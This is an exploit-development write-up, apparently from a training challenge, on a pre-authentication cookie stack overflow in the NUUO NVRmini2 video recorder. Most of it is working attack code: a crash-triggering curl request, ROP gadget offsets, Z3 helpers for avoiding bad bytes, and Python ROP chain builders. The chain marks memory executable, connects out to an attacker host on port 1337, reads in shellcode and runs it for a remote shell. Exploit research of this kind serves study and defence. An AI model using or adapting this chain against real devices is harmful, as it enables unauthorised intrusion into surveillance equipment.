Exploiting the NUUO NVRmini2
In may 2024 I attended a training course at OffensiveCon by the Flashback Team on vulnerability hunting in embedded devices and were in that class presented with a challenge to find and exploit a vulnerability in the NUUO NVRmini2 device.
This device is packed with vulnerabilities but I chose a buffer overflow in a PHPSESSID
cookie which was preauth.
Exploiting the bug for command execution was…pretty easy. But I want to run shellcode and that turned out to be a real challenge. Read on for how I finally got there.
Triggering the bug
You can trigger the vulnerability with this request:
$ curl -v --cookie PHPSESSID=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBBB 'http://target/cgi-bin/cgi_main?cmd=abc'
The above will run the binary /NUUO/bin/lite_mv
(via a symlink called cgi_main
).
At some point the binary will read the users session data which should be located on the file system in /tmp/sess_<SESSION ID>
. This path is built using sprintf
into a stack based buffer of size 128.
Providing a larger session id will overflow this buffer and 170 bytes down the line we will overwrite the return address which is stored on the stack.
A syscall trace of a crashing process looks like this:
[pid 520] open("/tmp/sess_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBBB", O_RDONLY) = -1 ENOENT (No such file or directory)
[pid 520] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
The environment
Ok, so we have a stack based buffer which we can easily overflow. The device has a 32 bit ARM processor and runs without ASLR but has NX, so we cannot simply return to shellcode. We will have to ROP this thing.
While playing around with this I found a great deal of bad bytes which I cannot use in my request:
bad_bytes = ( 0,1,2,3,4,5,6,7,8,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 )
This is pretty annoying. I prefer to write exploits that would work in any environment, also with ASLR turned on and the main binary is not position independent so using gadgets from that would be fine.
But it is loaded at base address 0x00010000
so all addresses contain bad bytes. It is useless!
$ readelf -Wl lite_mv | grep LOAD
LOAD 0x000000 0x00010000 0x00010000 0x39ab58 0x39ab58 R E 0x10000
LOAD 0x39b000 0x003bb000 0x003bb000 0x0f6e8 0x1e4d0 RW 0x10000
So how would I overcome ASLR?
Well, the kernel only provides 12 bits of entropy for libraries giving 4096 possible load addresses so if we only use gadgets from one library we can guess an address and simply brute force our way in.
Every time we retry exploitation the library would be loaded at a new address and at some point this would be our target address.
To keep things brute forceable I will not hardcode addresses other than my gadgets which will all be from the same library.
But during development I turn off ASLR to make things simple. On my home VM libc was loaded on 0xb6852000
but during training it was loaded differently.
Why is this important?
With the many bad bytes many gadgets cannot be used. The gadgets I do use MUST be valid when loaded relative to those two addresses or my exploit would only work in either the training environment or my home environment.
I want them to work on both…and if I had access to a real device I would also want them to work on that one as well.
Development environment
During development I have two ways of testing my code.
For the most part I use the Unicorn emulation engine for executing the code and my ROP chain.
I use LIEF for parsing ELF files and loading them into my Unicorn instance and during execution I use the Capstone engine for disassembling instructions.
Values in my ROP chain that only act as fillers have a special value (0xdeadbeef
) so that I can easily spot them, and if I want a "breakpoint" I use an unmapped address again with a special value (0xc0debabe
) which is easily recognizable.
That way Unicorn will make the emulation crash and I can dump the information that I need.

When I need a more thorough test I have a docker image which runs a Qemu full ARM system that I built using buildroot.
It is small but contains all that I need: ssh
, strace
, gdbserver
and a kernel supporting the 9P filesystem.
That filesystem allows me to share a host path with the Qemu guest.
Inside the guest I can often with little hassle run the target binaries and do syscall tracing, debugging and dump core.
ROP strategy
So, I want shellcode execution. There are many strategies I could follow and I did a couple that did not work (I will get back to one of them later and why it failed) but ended up with this pseudo C code:
mprotect(0x10000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC);
s = socket(AF_INET, SOCK_STREAM, 0);
connect(s, {AF_INET, "192.168.0.7", 1337}, sizeof(struct sockaddr_in));
read(s, 0x10000, 8198);
((void(*)())0x10000)();
That is what I want my ROP chain to do….mark a mapped area as read+write+executable, connect to my host, read shellcode into that area and jump there.
What makes this challenging is the vast number of bad bytes. Most of these values contain bad bytes so they cannot be used directly.
Instead I will look for gadgets that can take two values and add/subtract/xor/whatever to get the real value.
This is the list of gadgets I used in my final exploit:
gadgets = {
'ADD_R0_R3': (0x00017fc0, 'add r0, r0, r3 ; pop {lr} ; bx lr'),
'ADD_R3_R0_R3': (0x00095b50, 'add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5'),
'BX_R3': (0x00017e9c, 'bx r3'),
'MOV_R0_R4': (0x0002bbf0, 'mov r0, r4 ; pop {r4, lr} ; bx lr'),
'MOV_R1_R3': (0x000185c8, 'mov r1, r3 ; add sp, sp, #8 ; pop {r4, lr} ; bx lr'),
'MOV_R2_R0': (0x000d77c8, 'mov r2, r0 ; ldr r0, [pc, #0x3fc] ; moveq r0, ip ; blx r3'),
'MOV_R4_R0': (0x000e2dc8, 'mov r4, r0 ; add r0, sp, #0xc8 ; blx r3'),
'POP_HIGH': (0x00017e98, 'pop {r4, r5, r6, lr} ; bx r3'),
'POP_LOW': (0x00107fb0, 'pop {r0, r1, r2, r3, pc}'),
'POP_R0': (0x0010796c, 'pop {r0, pc}'),
'POP_R3': (0x00018ba0, 'pop {r3, lr} ; bx lr'),
'POP_R4_R5': (0x001071b8, 'pop {r4, r5, pc}'),
'STR_R0_R3': (0x000c7684, 'str r0, [r3] ; pop {r3, lr} ; bx lr')
}
These all pass the test that they do not contain bad bytes when added to one of my two libc base addresses.
The first two will be used for building a value with bad bytes from two values without them.
I used the Z3 constraint solver for getting two good values from a bad one:
def add_up_to(n):
s = z3.Solver()
a = z3.BitVec("a", 32)
b = z3.BitVec("b", 32)
s.add((a + b) == n)
for bad in bad_bytes:
for n in (a, b):
for i in range(4):
s.add(((n >> (i * 8)) & 0xff) != bad)
if s.check() != z3.sat:
raise Exception("Unsatisfiable")
m = s.model()
a = m.evaluate(a)
b = m.evaluate(b)
return (a.as_long(), b.as_long())
Testing this in a python repl:
>>> a, b = add_up_to(0x01000200)
>>> print(f"0x{a:08x} + 0x{b:08x} = 0x{(a+b) & 0xffffffff:08x}")
0x6f7f2191 + 0x9180e06f = 0x01000200
Building the ROP chain
Usually when building ROP chains I simply write something similar to this:
rop = flat([
# mprotect(0x010000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC)
# r0 <- 0x010000
POP_R0,
# pop {r0, pc}
0x010000, # r0 = 0x010000
POP_R3, # pc
....
# socket(AF_INET, SOCK_STREAM, 0)
...
])
But since this environment is so restricted by bad bytes this would quickly become a hassle.
Also what I want is to run a series of four libc functions all with no more than three arguments so my chain should consist of four similar blocks of gadgets.
Therefore I built a ROP chain building tool to help me out. It has three functions for building parts of a ROP chain and one using these to build the final chain.
The one that builds the final ROP chain is this one:
def connect_to_shellcode(self, host: Host) -> bytes:
addr = 0x10000
jmp = self.jump_to(addr)
read = self.call(self.READ, 3, addr, 4096 * 2, jmp[0])
connect = self.call(self.CONNECT, 3, addr, 16, read[0])
sockaddr = self.poke(sockaddr_in(host.addr, host.port), addr, connect[0])
socket = self.call(self.SOCKET, int(constants.AF_INET), int(constants.SOCK_STREAM), 0, sockaddr[0])
mprotect = self.call(self.MPROTECT, addr, 4096 * 2, 7, socket[0])
return flat([
mprotect[0],
mprotect[1],
socket[1],
sockaddr[1],
connect[1],
read[1],
jmp[1]
])
The jump_to
, call
and poke
methods will be described later. They return a tuple containing a gadget for starting the chain and the actual chain as a byte array.
The gadget is used for chaining the sub chains together. Those three methods are nasty as shit but using them was a real pleasure. It would be very easy to add more calls should the need arise.
Now lets look into the ROP builders.
jump_to(self, addr: int) → tuple[int, bytes]
This is the simplest one so lets start with that. We will use it to jump to the final shellcode which may lie at an address containing bad bytes.
It is implemented like this:
def jump_to(self, addr: int) -> tuple[int, bytes]:
addr_1, addr_2 = add_up_to(addr)
return (
self.POP_R4_R5,
flat([
# Gadget 1 : pop {r4, r5, pc}
GARBAGE, # r4
self.BX_R3, # r5 - Gadget 5
self.POP_R0, # pc - Gadget 2
# Gadget 2 : pop {r0, pc}
addr_1, # r0
self.POP_R3, # pc - Gadget 3
# Gadget 3 : pop {r3, lr} ; bx lr
addr_2, # r3
self.ADD_R3_R0_R3, # lr - Gadget 4
# Gadget 4 - add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
# Gadget 5 - bx r3
])
)
We start by splitting the target address into two bad bytes free values that when added together will give us back the target address.
Gadget 4 will add r0
to r3
and branch to r5
which is why we start the chain at gadget 1 with a snippet that lets us write into r5
. It will also write to r4
but since I don’t need that I put GARBAGE
there.
Next gadget 2 will put the first value into r0
and gadget 3 will put the second value into r3
.
Then gadget 4 adds these two together into r3
and branch off into the final gadget 5 which branches into our target address.
This is pretty much how the other more complex chains work too.
poke(self, what: bytes, where: int, next_gadget: int) → tuple[int,bytes]
This function is responsible for writing a byte array to an address. It is used for building an sockaddr_in
structure at a known location.
This is actually only a wrapper function that splits the byte array into blocks of four bytes and builds a chain that writes all of these blocks one at a time so let’s instead look at how a single block is written
_write_what_where(self, what: int, where: int, next_gadget: int) → tuple[int,bytes]:
This function will build a chain for writing the value in what
to the address in where
and then continuing to next_gadget
.
Both the what
and where
can contain bad bytes so that needs to be handled. The function is implemented like so:
def _write_what_where(self, what: int, where: int, next_gadget: int) -> tuple[int,bytes]:
what_1, what_2 = add_up_to(what)
where_1, where_2 = add_up_to(where)
return (
self.POP_R4_R5, # The gadget that gets the ball rolling...Gadget 1
flat([
# Gadget 1 : pop {r4, r5, pc}
GARBAGE, # r4
self.MOV_R0_R4, # r5 - Gadget 10
self.POP_R0, # pc - Gadget 2
# Gadget 2 : pop {r0, pc}
what_1, # r0
self.POP_R3, # pc - Gadget 3
# Gadget 3 : pop {r3, lr} ; bx lr
what_2, # r3
self.ADD_R0_R3, # lr - Gadget 4
# Gadget 4 : add r0, r0, r3 ; pop {lr} ; bx lr
self.POP_R3, # lr - Gadget 5
# Gadget 5 : pop {r3, lr} ; bx lr
self.POP_LOW, # r3 - Gadget 8
self.MOV_R4_R0, # lr - Gadget 7
# Gadget 7 : mov r4, r0 ; add r0, sp, #0xc8 ; blx r3
# Gadget 8 : pop {r0, r1, r2, r3, pc}
where_1, # r0
GARBAGE, # r1
GARBAGE, # r2
where_2, # r3
self.ADD_R3_R0_R3, # pc - Gadget 9
# Gadget 9 : add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
# Gadget 10 : mov r0, r4 ; pop {r4, lr} ; bx lr
GARBAGE, # r4
self.STR_R0_R3, # lr - Gadget 11
# Gadget 11 - str r0, [r3] ; pop {r3, lr} ; bx lr
GARBAGE, # r3
next_gadget # lr - Next gadget
]))
The series of instruction that actually writes to memory is this: str r0, [r3] ; pop {r3, lr} ; bx lr
So we need the what
value in r0
and where
in r3
. Again we use the add
gadget that ends up jumping to r5
which is why we start by writing to r5
at gadget 1.
Next at gadget 2-7 we put the two what
values into r0
and r3
, add them together and store the result away in r4
. We move the value to r4
so that we can calculate the where
value without loosing our newly calculated what
value.
Gadget 8 and 9 put the two where
values into r0
and r3
and add them together into r3
.
Gadget 10 moves the what
value from r4
back into r0
and now we are ready for gadget 11 that writes the value to the address and finally we can move on to the next gadget which was provided to the function.
def call(self, func: int, r0: int, r1: int, r2: int, next_gadget: int) → tuple[int,bytes]:
This function is insane!
When a function is called in the ARM architecture we use the blx
(branch and link) instruction. This will put the return address into the lr
register and transfer control to the target function which will read its arguments from r0
, r1
and r2
(for three argument functions), do its stuff and return to the address in lr
.
This means that we need to put possibly bad byte values into r0
, r1
and r2
, put the next gadget into lr
and branch off into the function….oh, and by the way, two of the functions I want to call lie on addresses with bad bytes, so the func
argument also needs to handle bad bytes.
The next_gadget
argument may not contain bad bytes because it is called when everything is done and thus we can find a gadget that is bad byte free easily.
I did find a chain for setting r0
, r1
, r2
and lr
but jumping to that function proved…difficult but solvable.
In the case where the function contains bad bytes I prepend a chain the calculates the address and then writes it to the stack at the right offset so that I can simply ignore the fact that it is bad. I then simply write 0x44444444
instead.
Let’s start with the chain that sets registers and calls the function and ignore that the function may contain bad bytes.
def call(self, func: int, r0: int, r1: int, r2: int, next_gadget: int) -> tuple[int,bytes]:
r0_1, r0_2 = add_up_to(r0)
r1_1, r1_2 = add_up_to(r1)
r2_1, r2_2 = add_up_to(r2)
first_gadget = self.POP_LOW
callsite_modifier = b""
....
return (
first_gadget,
flat([
callsite_modifier,
# First set r2
# Gadget 1 : pop {r0, r1, r2, r3, pc}
r2_1, # r0
GARBAGE, # r1
GARBAGE, # r2
r2_2, # r3
self.ADD_R0_R3, # pc - Gadget 2
# Gadget 2 : add r0, r0, r3 ; pop {lr} ; bx lr
self.POP_R3, # lr - Gadget 3
# Gadget 3 : pop {r3, lr} ; bx lr
self.POP_R0, # r3 - Gadget 5
self.MOV_R2_R0, # lr - Gadget 4
# Gadget 4 : mov r2, r0 ; ldr r0, [pc, #0x3fc] ; moveq r0, ip ; blx r3
# Next set r1
# Gadget 5 : pop {r0, pc}
r1_1, # r0
self.POP_R3, # pc - Gadget 6
# Gadget 6 : pop {r3, lr} ; bx lr
r1_2, # r3
self.POP_R4_R5, # lr - Gadget 7
# Gadget 7 : pop {r4, r5, pc}
GARBAGE, # r4
self.MOV_R1_R3, # r5 - Gadget 9
self.ADD_R3_R0_R3, # pc - Gadget 8
# Gadget 8 : add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
# Gadget 9 : mov r1, r3 ; add sp, sp, #8 ; pop {r4, lr} ; bx lr
GARBAGE, # Skipped
GARBAGE, # Skipped
GARBAGE, # r4
self.POP_R0, # lr - Gadget 10
# Last set r0
# Gadget 10 : pop {r0, pc}
r0_1, # r0
self.POP_R3, # pc - Gadget 11
# Gadget 11 : pop {r3, lr} ; bx lr
r0_2, # r3
self.ADD_R0_R3, # lr - Gadget 12
# Gadget 12 : add r0, r0, r3 ; pop {lr} ; bx lr
self.POP_R3, # lr : Gadget 13
# Gadget 13 : pop {r3, lr} ; bx lr
func, # r3 - Gadget 15
self.POP_HIGH, # lr - Gadget 14
# Gadget 14 : pop {r4, r5, r6, lr} ; bx r3
GARBAGE, # r4
GARBAGE, # r5
GARBAGE, # r6
next_gadget, # lr - Gadget 15
# Gadget 15 : func(r0, r1, r2)
])
)
Gadgets 1-4 sets r2
using simple pop
, add
and mov
gadgets. You should be able to read this by now.
Next gadget 5-9 set r1
without touching r2
.
Gadget 10-14 set lr
to the next_gadget
address and r3
to the target function address and finally jumps to r3
.
The func
value is popped off the stack in gagdet 13. If that address contains bad bytes we prepend the following chain through the callsite_modifier
variable which is otherwise an empty byte array.
if check(func) == False:
# Function contains bad bytes. Prepend chain that sets it
first_gadget = self.POP_R4_R5
func_1, func_2 = add_up_to(func)
offset_1, offset_2 = add_up_to(0xffffffbc)
func = 0x44444444
callsite_modifier = flat([
# Gadget 1 : pop {r4, r5, pc}
GARBAGE, # r4
self.MOV_R0_R4, # r5 - Gadget 12
self.POP_R0, # pc - Gadget 2
# Gadget 2 : pop {r0, pc}
func_1, # r0
self.POP_R3, # pc - Gadget 3
# Gadget 3 : pop {r3, lr} ; bx lr
func_2, # r3
self.ADD_R0_R3, # lr - Gadget 4
# Gadget 4 : add r0, r0, r3 ; pop {lr} ; bx lr
self.POP_R3, # lr - Gadget 5
# Gadget 5 : pop {r3, lr} ; bx lr
self.POP_R3, # r3 - Gadget 8
self.MOV_R4_R0, # lr - Gadget 7
# Gadget 7 : mov r4, r0 ; add r0, sp, #0xc8 ; blx r3
# Gadget 8 : pop {r3, lr} ; bx lr
offset_1, # r3
self.ADD_R0_R3, # lr - Gadget 9
# Gadget 9 : add r0, r0, r3 ; pop {lr} ; bx lr
self.POP_R3, # lr - Gadget 10
# Gadget 10 : pop {r3, lr} ; bx lr
offset_2, # r3
self.ADD_R3_R0_R3, # lr - Gadget 11
# Gadget 11 : add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
# Gadget 12 : mov r0, r4 ; pop {r4, lr} ; bx lr
GARBAGE, # r4
self.STR_R0_R3, # lr - Gadget 13
# Gadget 13 : str r0, [r3] ; pop {r3, lr} ; bx lr
GARBAGE, # r3
self.POP_LOW, # lr - Gadget 14
])
Gadgets 1-7 calculate the target address and store it away in r4
like we have seen previously.
Gadget 7 further puts the stack pointer into r0
.
Gadget 8-11 adds an offset to this stack address to find the spot where our target address need to be and put this address into r3
.
Gadget 12 and 13 first move the target address to r0
and then write it to r3
so now we have the right target address on the stack ready for the remaining chain.
Nice, huh?
Drum roll
So, does it work?
My exploit can run both emulated with different levels of verbosity and against an actual target. My target is an ssh tunnel pointing to my ARM based VM:

Yes. Yes, it does.
The shellcode for the emulator simply writes to stdout
and then exits. The one I send to the actual target gives me a shell.
Get my final exploit here.
Failed attempts
I tried other simpler solutions before landing on the above madness.
I pretty quickly realized that I needed something that could write arbitrary data to arbitrary addresses so the poke
function was the first one I did.
Having that I thought to myself…why not first mprotect
a page and simply poke
shellcode using the ROP chain?
I did that and the chain for a fairly small shellcode ended up being more than 4KB large and apparently that was too much because not all of it ran.
This was a fun challenge!